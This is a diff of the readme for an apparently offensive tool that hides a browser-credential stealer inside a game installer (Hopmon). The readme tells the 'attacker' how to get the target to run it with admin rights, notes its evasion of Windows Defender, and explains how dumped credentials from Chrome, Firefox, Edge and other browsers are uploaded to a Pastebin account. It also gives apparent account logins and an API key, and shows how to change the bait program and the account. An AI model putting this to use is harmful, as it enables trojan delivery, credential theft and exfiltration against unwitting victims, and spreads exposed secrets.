r00t-3xp10it/redpill/lib/Dump-Browser/readme.md

 **Final Notes**
 ```
-**ACCESS-PASTEBIN-TO-REVIEW-CREDENTIALS-DUMP:**<br />
+ACCESS-PASTEBIN-TO-REVIEW-CREDENTIALS-DUMP:
   * The attacker needs to access URL : https://pastebin.com/u/pedro_testing
   * The attacker needs to login with username : pedro_testing
   * The attacker needs to login with password : angelapastebin
    - [The attacker can now review the contents of logfiles] -

-.WHAT-CAN-GO-WRONG?
+WHAT-CAN-GO-WRONG?
   * The target did not execute Hopmon.exe with admin
     privileges when the EXE program asks for UAC access (admin)
   * The target as a diferent anti-virus instaled besides windows defender (default)
     and the probability of this scripts bypass other anti-virus detection its smaller.
   * The target uses a web browser not supported by this project so it can not dump is credentials
    Browsers supported are: Chromium, Chrome, Firefox, IE, MEdge, Safari, Opera

-.FINAL-NOTES
-   * How to install a diferent game\program ?
+How to install a diferent game\program ?
   a) Edit Hopmon.vbs script
   b) Search inside the file for '-file Hopmon.ps1'
   c) Replace '-file Hopmon.ps1' by '-file Hopmon.ps1 -Program Sunshine'
   d) Send Hopmon.vbs (or compile to EXE) to target for manual execution.

-   * How to list WinGet (microsoft store) games available ?
+How to list WinGet (microsoft store) games available ?
   Winget search games

-   * How to use a diferent pastebin account ?
+How to use a diferent pastebin account ?
   a) Edit Hopmon.vbs script
   b) Search inside the file for '-file Hopmon.ps1'
   c) Replace '-file Hopmon.ps1' by '-file Hopmon.ps1 -PasteBinUserName r00t-3xp10it -PasteBinPassword angela -PastebinDeveloperKey 1ab4a1a4e39c94db4'
   d) Send Hopmon.vbs (or compile to EXE) to target for manual execution.
 ```